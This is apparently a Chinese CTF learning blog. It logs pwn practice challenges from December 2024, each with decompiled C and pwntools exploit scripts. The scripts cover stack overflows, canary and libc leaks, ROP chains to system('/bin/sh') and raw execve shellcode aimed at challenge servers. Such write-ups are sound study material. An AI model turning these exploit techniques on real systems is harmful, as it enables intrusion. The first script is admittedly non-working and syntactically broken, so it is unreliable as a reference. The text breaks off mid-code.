title="2024-12-4"></a>2024-12-4</h3><p>一道保护全开的题目，&#x2F;&#x2F;TODO </p><p>main：</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">int</span> __fastcall <span class="title function_">main</span><span class="params">(<span class="type">int</span> argc, <span class="type">const</span> <span class="type">char</span> **argv, <span class="type">const</span> <span class="type">char</span> **envp)</span></span><br><span class="line">&#123;</span><br><span class="line">  <span class="type">int</span> v4; <span class="comment">// [rsp+Ch] [rbp-94h]</span></span><br><span class="line">  <span class="type">char</span> buf[<span class="number">136</span>]; <span class="comment">// [rsp+10h] [rbp-90h] BYREF</span></span><br><span class="line">  <span class="type">unsigned</span> __int64 v6; <span class="comment">// [rsp+98h] [rbp-8h]</span></span><br><span class="line"></span><br><span class="line">  v6 = __readfsqword(<span class="number">0x28</span>u);</span><br><span class="line">  <span class="built_in">memset</span>(buf, <span class="number">0</span>, <span class="keyword">sizeof</span>(buf));</span><br><span class="line">  alarm(<span class="number">0x3C</span>u);</span><br><span class="line">  setbuf(_bss_start, <span class="number">0LL</span>);</span><br><span class="line">  welcome();</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">&quot;Can you give me your name?&quot;</span>);</span><br><span class="line">  v4 = read(<span class="number">0</span>, buf, <span class="number">0x100</span>uLL);</span><br><span class="line">  <span class="keyword">if</span> ( buf[v4 - <span class="number">1</span>] == <span class="number">10</span> )</span><br><span class="line">    buf[v4 - <span class="number">1</span>] = <span class="number">0</span>;</span><br><span class="line">  <span class="built_in">printf</span>(<span class="string">&quot;\nHello %s.\n\n&quot;</span>, buf);</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">&quot;Do you have anything you want to say to me?&quot;</span>);</span><br><span class="line">  read(<span class="number">0</span>, buf, <span class="number">0x100</span>uLL);</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">&quot;See you next time!&quot;</span>);</span><br><span class="line">  <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>（感觉思路是很明确的，理论成立，实践拉跨（欸嘿</p><p>这是第一版写的答案：（orz一直没打通，然后pwn✌发了wp看着问题在哪里</p><p>（还是没太明白，留着等学的扎实一点再看吧（欸嘿</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">p = process(<span class="string">&#x27;./vuln&#x27;</span>) </span><br><span class="line">elf = ELF(<span class="string">&#x27;./vuln&#x27;</span>)</span><br><span class="line">libc = ELF(<span class="string">&#x27;./libc.so.6&#x27;</span>)//?</span><br><span class="line"></span><br><span class="line"><span class="comment">#------leak canary elf_base------#</span></span><br><span class="line">p.recvuntil(<span class="string">b&quot;What&#x27;s your name:&quot;</span>)</span><br><span class="line">payload1 = <span class="string">b&#x27;A&#x27;</span> * <span class="number">0x88</span> +<span class="string">b&#x27;A&#x27;</span> //<span class="number">136</span>(<span class="number">10</span>) 这里额外的A覆盖返回地址（但是不知道 为什么（坏））</span><br><span class="line">p.sendline(payload1)</span><br><span class="line">p.recvuntil(<span class="string">b&#x27;A&#x27;</span>*<span class="number">0x88</span>)</span><br><span class="line"></span><br><span class="line">canary1 = u64(p,recv(<span class="number">8</span>))-<span class="built_in">ord</span>(<span class="string">&#x27;A&#x27;</span>) // </span><br><span class="line">elf_base = u64(p.recv(<span class="number">6</span>).ljust(<span class="number">8</span>,<span class="string">b&#x27;\x00&#x27;</span>)) - <span class="number">0x10a0</span> //奇怪的是我这边偏移这么大（？</span><br><span class="line"><span class="built_in">print</span>(<span class="built_in">hex</span>(canary1))</span><br><span class="line"><span class="built_in">print</span>(<span class="built_in">hex</span>(elf_base))</span><br><span class="line"></span><br><span class="line"><span class="comment">#-------leak libc_base-------#</span></span><br><span class="line">p.recvuntil(<span class="string">b&quot;Hello &quot;</span>)</span><br><span class="line">leak = p.recvline().strip()</span><br><span class="line">canary2 = u64(leak.ljust(<span class="number">8</span>, <span class="string">b&#x27;\x00&#x27;</span>))  </span><br><span class="line">log.success(<span class="string">f&quot;Leaked Canary: <span class="subst">&#123;<span class="built_in">hex</span>(canary2)&#125;</span>&quot;</span>)</span><br><span class="line"></span><br><span class="line">pop_rdi_ret = <span class="number">0xcb3</span></span><br><span class="line">main_addr = elf_base + <span class="number">0xaa2</span> //?</span><br><span class="line">payload2 = <span class="string">b&#x27;A&#x27;</span> * <span class="number">144</span> + p64(canary) + <span class="string">b&#x27;B&#x27;</span> * <span class="number">8</span>  </span><br><span class="line">payload2 += p64(elf_base)</span><br><span class="line">payload2 += p64(puts_plt)  </span><br><span class="line">payload2 += p64(main_addr) </span><br><span class="line">payload2 += p64(puts_got)  </span><br><span class="line">p.sendafter(<span class="string">&#x27;say?&#x27;</span>,payload2)</span><br><span class="line">puts_leak = u64(p.recv(<span class="number">6</span>).ljust(<span class="number">8</span>, <span class="string">b&#x27;\x00&#x27;</span>))  </span><br><span class="line">libc_base = puts_leak - puts_offset  </span><br><span class="line">log.success(<span class="string">f&quot;Leaked libc base: <span class="subst">&#123;<span class="built_in">hex</span>(libc_base)&#125;</span>&quot;</span>)</span><br><span class="line"><span class="comment">#------ret2 one_gadget--------#</span></span><br><span class="line">system = libc_base + libc.symbols[<span class="string">&#x27;system&#x27;</span>]</span><br><span class="line">bin_sh = libc_base + <span class="built_in">next</span>(libc.search(<span class="string">b&#x27;/bin/sh&#x27;</span>))</span><br><span class="line"></span><br><span class="line">payload3 = <span class="string">b&#x27;A&#x27;</span> * <span class="number">144</span></span><br><span class="line">payload3 += p64(canary)</span><br><span class="line">payload3 += <span class="string">b&#x27;B&#x27;</span> * <span class="number">8</span> </span><br><span class="line">payload3 += p64(ret)  </span><br><span class="line">payload3 += p64(system)</span><br><span class="line">payload3 += p64(<span class="number">0</span>)  </span><br><span class="line">payload3 += p64(bin_sh)  </span><br><span class="line">p.sendafter(<span class="string">&#x27;say?&#x27;</span>,payload3)</span><br><span class="line"></span><br><span class="line">p.interactive()  </span><br></pre></td></tr></table></figure><p>蚌，理论和实践差太多了。<br>orz多做题喵。。</p><h3 id="HGAME-2023-week1-test-nc"><a href="#HGAME-2023-week1-test-nc" class="headerlink" title="[HGAME 2023 week1]test_nc"></a>[HGAME 2023 week1]test_nc</h3><p>？nc</p><h3 id="watevrCTF-2019-Voting-Machine-1"><a href="#watevrCTF-2019-Voting-Machine-1" class="headerlink" title="[watevrCTF 2019]Voting Machine 1"></a>[watevrCTF 2019]Voting Machine 1</h3><p>甚至看了一下这个flag展示函数，自动展示（感恩）</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">p = remote(<span class="string">&quot;node5.anna.nssctf.cn&quot;</span>,<span class="number">20006</span>)</span><br><span class="line">backdoor = <span class="number">0x400807</span></span><br><span class="line">payload = <span class="string">b&#x27;A&#x27;</span>*(<span class="number">0x2</span>+<span class="number">8</span>) + p64(backdoor)</span><br><span class="line">p.sendline(payload)</span><br><span class="line">p.interactive() </span><br></pre></td></tr></table></figure><h3 id="HNCTF-2022-Week1-easyoverflow"><a href="#HNCTF-2022-Week1-easyoverflow" class="headerlink" title="[HNCTF 2022 Week1]easyoverflow"></a>[HNCTF 2022 Week1]easyoverflow</h3><p>（终于知道最基础的ret2text是什么样子了（<br>存一个c：</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span><span class="string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="type">int</span> <span class="title function_">main</span><span class="params">()</span></span><br><span class="line">&#123;</span><br><span class="line">    setbuf(<span class="built_in">stdin</span>,<span class="number">0</span>);</span><br><span class="line">    setbuf(<span class="built_in">stdout</span>,<span class="number">0</span>);</span><br><span class="line">    setbuf(<span class="built_in">stderr</span>,<span class="number">0</span>);</span><br><span class="line">    <span class="built_in">puts</span>(<span class="string">&quot;Input something&quot;</span>);</span><br><span class="line">    <span class="type">char</span> name[<span class="number">30</span>];</span><br><span class="line">    <span class="type">int</span> number=<span class="number">0</span>;</span><br><span class="line">    gets(name);</span><br><span class="line">    <span class="keyword">if</span>(number!=<span class="number">0</span>)&#123;</span><br><span class="line">        <span class="built_in">puts</span>(<span class="string">&quot;You win.&quot;</span>);</span><br><span class="line">        system(<span class="string">&quot;cat flag&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>exp：</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">p = remote(<span class="string">&quot;node5.anna.nssctf.cn&quot;</span>,<span class="number">29251</span>)</span><br><span class="line"><span class="comment">#backdoor = 0x400807</span></span><br><span class="line">payload = <span class="string">b&#x27;A&#x27;</span>*(<span class="number">0x30</span>-<span class="number">0x4</span>)+<span class="string">b&#x27;B&#x27;</span></span><br><span class="line">p.sendline(payload)</span><br><span class="line">p.interactive() </span><br></pre></td></tr></table></figure><h3 id="NISACTF-2022-ezpie"><a href="#NISACTF-2022-ezpie" class="headerlink" title="[NISACTF 2022]ezpie"></a>[NISACTF 2022]ezpie</h3><p>PIE保护的ret2text hhhh可爱捏</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context(os = <span class="string">&#x27;linux&#x27;</span>,arch=<span class="string">&#x27;i386&#x27;</span>,log_level=<span class="string">&#x27;debug&#x27;</span>)</span><br><span class="line">p = remote(<span class="string">&quot;node7.anna.nssctf.cn&quot;</span>,<span class="number">26619</span>)</span><br><span class="line"></span><br><span class="line">main_addr = <span class="number">0x0770</span></span><br><span class="line">backdoor_addr = <span class="number">0x080F</span></span><br><span class="line">p.recvline()</span><br><span class="line">base = <span class="built_in">int</span>(p.recvuntil(<span class="string">&#x27;\n&#x27;</span>,drop=<span class="literal">True</span>),<span class="number">16</span>)</span><br><span class="line"></span><br><span class="line">payload = <span class="string">b&#x27;A&#x27;</span>*(<span class="number">0x28</span>+<span class="number">4</span>)+p32( base + backdoor_addr-main_addr)</span><br><span class="line">p.sendline(payload)</span><br><span class="line">p.interactive() </span><br></pre></td></tr></table></figure><h3 id="GFCTF-2021-where-is-shell"><a href="#GFCTF-2021-where-is-shell" class="headerlink" title="[GFCTF 2021]where_is_shell"></a>[GFCTF 2021]where_is_shell</h3><p>正好是这页的最后一个🥰🥰<br>题目提示:<br>代码段是有r权限的的，所以字符串可以在代码段上</p><p>记得之前似乎有看到过，调用shell的方法之一是system($0)<br>这次才知道$0再机器码中为\x24\x30<br>似乎比我想的复杂一点（</p><blockquote><p>pop rdi ret :<br>一种常见的ROPgadget，ret弹出一个地址，再使用pop rdi ret 把之前的shell地址存入rdi寄存器中，最后再调用system函数</p></blockquote><p>这时因为rdi有之前存入的$0，很好的函数调用👍</p><blockquote><p>ROPgadget –binary shell –only “pop|ret”<br>┌──(kali㉿kali)-[~&#x2F;Desktop]</p><p>└─$ ROPgadget –binary shell –only “pop|ret” </p><p>Gadgets information</p><p>&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;</p><p>0x00000000004005dc : pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret </p><p>0x00000000004005de : pop r13 ; pop r14 ; pop r15 ; ret</p><p>0x00000000004005e0 : pop r14 ; pop r15 ; ret</p><p>0x00000000004005e2 : pop r15 ; ret</p><p>0x00000000004005db : pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; &gt; ret</p><p>0x00000000004005df : pop rbp ; pop r14 ; pop r15 ; ret</p><p>0x00000000004004b8 : pop rbp ; ret</p><p>0x00000000004005e3 : pop rdi ; ret</p><p>0x00000000004005e1 : pop rsi ; pop r15 ; ret</p><p>0x00000000004005dd : pop rsp ; pop r13 ; pop r14 ; pop r15 ; ret</p><p>0x0000000000400416 : ret</p><p>Unique gadgets found: 11</p></blockquote><p>pop rdi ret  0x4005e3   |   ret  0x400416</p><p>接着是之前经常提到的栈对齐问题</p><blockquote><p>x86-64 ABI（应用程序二进制接口）保证了在调用指令上的 16-bits 对齐。libc 利用了这一点，并使用 SSE 数据传输指令来优化执行；特别是在 system 中会使用诸如 movaps 等指令。<br>这意味着如果栈不是 16-bits 对齐的（即 RSP 不是 16 的倍数），那么 ROP 链在执行 system 时会失败。</p><p>修复方法很简单，在你的 ROP 链中调用 system 之前，插入一个单独的 ret gadget：</p></blockquote><p>exp:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context(os = <span class="string">&#x27;linux&#x27;</span>,arch=<span class="string">&#x27;i386&#x27;</span>,log_level=<span class="string">&#x27;debug&#x27;</span>)</span><br><span class="line">p = remote(<span class="string">&quot;node4.anna.nssctf.cn&quot;</span>,<span class="number">28984</span>)</span><br><span class="line">elf = ELF(<span class="string">&#x27;./shell&#x27;</span>)</span><br><span class="line"></span><br><span class="line">pop_rdi_ret = <span class="number">0x4005e3</span></span><br><span class="line">ret = <span class="number">0x400416</span></span><br><span class="line">backdoor = <span class="number">0x400541</span>  //这里是<span class="number">1</span>，因为第一个是call的机器码</span><br><span class="line">system_addr = elf.symbols[<span class="string">&#x27;system&#x27;</span>]</span><br><span class="line">payload = <span class="string">b&#x27;b&#x27;</span>*(<span class="number">0x10</span>+<span class="number">8</span>)+p64(ret_addr)+p64(pop_rdi_ret)+p64(backdoor)+p64(system_addr)</span><br><span class="line"></span><br><span class="line">p.sendafter(<span class="string">&#x27;find it?\n&#x27;</span>,payload)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure><h2 id="2024-12-5"><a href="#2024-12-5" class="headerlink" title="2024-12-5"></a>2024-12-5</h2><h3 id="NSSCTF-2022-Spring-Recruit-R3m4ke"><a href="#NSSCTF-2022-Spring-Recruit-R3m4ke" class="headerlink" title="[NSSCTF 2022 Spring Recruit]R3m4ke?"></a>[NSSCTF 2022 Spring Recruit]R3m4ke?</h3><blockquote><p> char v4[32]; &#x2F;&#x2F; [rsp+0h] [rbp-20h] BYREF</p></blockquote><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context(os = <span class="string">&#x27;linux&#x27;</span>,arch=<span class="string">&#x27;i386&#x27;</span>,log_level=<span class="string">&#x27;debug&#x27;</span>)</span><br><span class="line">p = remote(<span class="string">&quot;node4.anna.nssctf.cn&quot;</span>,<span class="number">28301</span>)</span><br><span class="line">elf = ELF(<span class="string">&#x27;./r3m4ke1t&#x27;</span>)</span><br><span class="line"></span><br><span class="line">backdoor = <span class="number">0x040072C</span></span><br><span class="line">payload = <span class="string">b&#x27;A&#x27;</span>*(<span class="number">0x20</span>+<span class="number">8</span>) + p64(backdoor)</span><br><span class="line">p.send(payload)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure><h3 id="HNCTF-2022-Week1-ret2shellcode"><a href="#HNCTF-2022-Week1-ret2shellcode" class="headerlink" title="[HNCTF 2022 Week1]ret2shellcode"></a>[HNCTF 2022 Week1]ret2shellcode</h3><p>新的东西！<br><strong>ret2shellcode</strong><br><strong>感谢pwn爹！！！寥寥几句讲的好清楚</strong></p><blockquote><p>这里要确认buff的bss段是否可写：</p></blockquote><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context(os = <span class="string">&#x27;linux&#x27;</span>,arch=<span class="string">&#x27;amd64&#x27;</span>,log_level=<span class="string">&#x27;debug&#x27;</span>)</span><br><span class="line">p = remote(<span class="string">&quot;node5.anna.nssctf.cn&quot;</span>,<span class="number">21499</span>)</span><br><span class="line">elf = ELF(<span class="string">&#x27;./shellcode&#x27;</span>)</span><br><span class="line"></span><br><span class="line">shellcode = asm(shellcraft.sh())</span><br><span class="line">target = <span class="number">0x4040A0</span></span><br><span class="line">payload = shellcode.ljust(<span class="number">256</span>+<span class="number">8</span>) + p64(target)</span><br><span class="line">p.send(payload)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure><p>注意这里是amd64（！！！</p><h3 id="GDOUCTF-2023-Shellcode"><a href="#GDOUCTF-2023-Shellcode" class="headerlink" title="[GDOUCTF 2023]Shellcode"></a>[GDOUCTF 2023]Shellcode</h3><p>NX保护，amd64</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context(os = <span class="string">&#x27;linux&#x27;</span>,arch=<span class="string">&#x27;amd64&#x27;</span>,log_level=<span class="string">&#x27;debug&#x27;</span>)</span><br><span class="line">p = remote(<span class="string">&quot;node4.anna.nssctf.cn&quot;</span>,<span class="number">28209</span>)</span><br><span class="line">elf = ELF(<span class="string">&#x27;./pwn12&#x27;</span>)</span><br><span class="line"></span><br><span class="line">shellcode = asm(shellcraft.cat(<span class="string">&quot;flag&quot;</span>))</span><br><span class="line">p.sendlineafter(<span class="string">&quot;Please.&quot;</span>,shellcode)</span><br><span class="line">target = <span class="number">0x6010A0</span></span><br><span class="line">payload = <span class="string">b&#x27;a&#x27;</span>*(<span class="number">0xA</span>+<span class="number">8</span>) + p64(target)</span><br><span class="line">p.sendafter(<span class="string">&quot;start!&quot;</span>,payload)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context(os = <span class="string">&#x27;linux&#x27;</span>,arch=<span class="string">&#x27;amd64&#x27;</span>,log_level=<span class="string">&#x27;debug&#x27;</span>)</span><br><span class="line">p = remote(<span class="string">&quot;node4.anna.nssctf.cn&quot;</span>,<span class="number">28209</span>)</span><br><span class="line">elf = ELF(<span class="string">&#x27;./pwn12&#x27;</span>)</span><br><span class="line"></span><br><span class="line">shellcode = <span class="string">b&#x27;\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\x6a\x3b\x58\x99\x0f\x05&#x27;</span></span><br><span class="line">p.sendlineafter(<span class="string">&quot;Please.&quot;</span>,shellcode)</span><br><span class="line">target = <span class="number">0x6010A0</span></span><br><span class="line">payload = <span class="string">b&#x27;a&#x27;</span>*(<span class="number">0xA</span>+<span class="number">8</span>) + p64(target)</span><br><span class="line">p.sendafter(<span class="string">&quot;start!&quot;</span>,payload)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure><h2 id="2024-12-10"><a href="#2024-12-10" class="headerlink" title="2024-12-10"></a>2024-12-10</h2><p>好久没写了<br>（也不是（周六赤石去了</p><h3 id="SWPUCTF-2022-新生赛-贪吃蛇"><a href="#SWPUCTF-2022-新生赛-贪吃蛇" class="headerlink" title="[SWPUCTF 2022 新生赛]贪吃蛇"></a>[SWPUCTF 2022 新生赛]贪吃蛇</h3><p>？！直接静态看flag加密。xor0x52<br>欸嘿</p><h3 id="HGAME-2022-week1-test-your-gdb"><a href="#HGAME-2022-week1-test-your-gdb" class="headerlink" title="[HGAME 2022 week1]test your gdb"></a>[HGAME 2022 week1]test your gdb</h3><p>有金丝雀</p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241210225914078.png" alt="image-20241210225914078"></p><p>动调解除密文：</p><p>debug002:00007FA5FC928E90 dq 0B0361E0E8294F147h</p><p>debug002:00007FA5FC928E98 dq 8C09E0C34ED8A6A9h</p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241210225740471.png" alt="image-20241210225740471"></p><p>接着后门：</p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241210225810403.png" alt="image-20241210225810403"></p><p>exp：</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">context(os=<span class="string">&#x27;linux&#x27;</span>, arch=<span class="string">&#x27;amd64&#x27;</span>, log_level=<span class="string">&#x27;debug&#x27;</span>)</span><br><span class="line"></span><br><span class="line">p = remote(<span class="string">&#x27;node5.anna.nssctf.cn&#x27;</span>, <span class="number">27287</span>)</span><br><span class="line">elf = ELF(<span class="string">&#x27;./service&#x27;</span>)</span><br><span class="line"></span><br><span class="line">backdoor = <span class="number">0x401256</span></span><br><span class="line">password = p64(<span class="number">0xb0361e0e8294f147</span>) + p64(<span class="number">0x8c09e0c34ed8a6a9</span>)</span><br><span class="line">p.sendafter(<span class="string">b&#x27;enter your pass word\n&#x27;</span>, password)</span><br><span class="line"></span><br><span class="line">canary = u64(p.recv()[<span class="number">0x20</span> - <span class="number">0x08</span>:<span class="number">0x20</span>])</span><br><span class="line">payload = cyclic(<span class="number">0x20</span> - <span class="number">0x08</span>) + p64(canary) + p64(<span class="number">0</span>) + p64(backdoor)</span><br><span class="line">p.sendline(payload)</span><br><span class="line"></span><br><span class="line">p.interactive()</span><br><span class="line"></span><br></pre></td></tr></table></figure><h2 id="2024-12-14"><a href="#2024-12-14" class="headerlink" title="2024-12-14"></a>2024-12-14</h2><h3 id="LitCTF-2023-口算题卡"><a href="#LitCTF-2023-口算题卡" class="headerlink" title="[LitCTF 2023]口算题卡"></a>[LitCTF 2023]口算题卡</h3><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">p = remote(<span class="string">&quot;node4.anna.nssctf.cn&quot;</span>, <span class="number">28187</span>)</span><br><span class="line">context(os=<span class="string">&quot;linux&quot;</span>, arch=<span class="string">&quot;i386&quot;</span>, log_level=<span class="string">&quot;debug&quot;</span>)</span><br><span class="line">recv_header = p.recvuntil(<span class="string">b&quot;Have fun!\n&quot;</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> x <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">100</span>):</span><br><span class="line">    p.recvuntil(<span class="string">b&quot;What is&quot;</span>)</span><br><span class="line">    </span><br><span class="line">    key = p.recvuntil(<span class="string">b&quot;?&quot;</span>)</span><br><span class="line">    payload = flat([</span><br><span class="line">        <span class="built_in">str</span>(<span class="built_in">eval</span>(key[:-<span class="number">1</span>]))</span><br><span class="line">    ])</span><br><span class="line">    <span class="built_in">print</span>(<span class="built_in">eval</span>(key[:-<span class="number">1</span>]))</span><br><span class="line">    p.sendline(payload)</span><br><span class="line">p.interactive()</span><br><span class="line"></span><br></pre></td></tr></table></figure><h3 id="HUBUCTF-2022-新生赛-fmt"><a href="#HUBUCTF-2022-新生赛-fmt" class="headerlink" title="[HUBUCTF 2022 新生赛]fmt"></a>[HUBUCTF 2022 新生赛]fmt</h3><h3 id="BJDCTF-2020-babyrop"><a href="#BJDCTF-2020-babyrop" class="headerlink" title="[BJDCTF 2020]babyrop"></a>[BJDCTF 2020]babyrop</h3><figure class="highlight cmd"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/home/kali/Desktop/pwn90: ELF <span class="number">64</span>-bit LSB executable, x86-<span class="number">64</span>, version <span class="number">1</span> (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-<span class="number">64</span>.so.<span class="number">2</span>, <span class="keyword">for</span> GNU/Linux <span class="number">2</span>.<span class="number">6</span>.<span class="number">32</span>, BuildID[sha1]=ebe33bb41cb0dcdde518b9dfb38eb03a104ee0b7, <span class="keyword">not</span> stripped</span><br></pre></td></tr></table></figure><p>思路： </p><ul><li>利用puts函数泄露libc版本</li><li>计算偏移</li><li>找system和bin&#x2F;sh</li><li>构造rop</li></ul><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241214215717407.png" alt="image-20241214215717407"></p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span 